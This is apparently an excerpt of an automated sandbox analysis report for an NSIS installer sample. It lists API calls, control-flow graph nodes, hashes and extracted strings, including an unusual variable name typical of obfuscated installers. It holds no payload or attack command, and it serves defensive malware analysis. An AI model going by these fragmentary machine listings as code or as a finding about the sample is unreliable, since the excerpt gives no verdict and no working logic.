                                                                                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,PaypalInteriorNvidiaNirvana,PaypalInteriorNvidiaNirvana,00000000,00000000,PaypalInteriorNvidiaNirvana,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$PaypalInteriorNvidiaNirvana
                                                                                                                                                                                                                                                                                        • API String ID: 4286501637-474588278

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                        • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0042795A,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                        • String ID: (]C$... %d%%$ZyB$pAB
                                                                                                                                                                                                                                                                                        • API String ID: 651206458-4104317456
                                                                                                                                                                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:
• API String ID: 2740478559-0

Control-flow Graph

control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNELBASE(00761BA8), ref: 00402387
Strings
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$PaypalInteriorNvidiaNirvana$Pop: stack empty
• API String ID: 1459762280-2908248783

Control-flow Graph

control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• GlobalFree.KERNELBASE(00761BA8), ref: 00402387
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0

Control-flow Graph

control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                        • String ID: <RM>$PaypalInteriorNvidiaNirvana$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                        • API String ID: 247603264-1058689761

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                        • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FilePointer
APIs
• SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_din.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
• Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
• Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
• Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
APIs
• KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_din.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
• Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
• Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
• Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
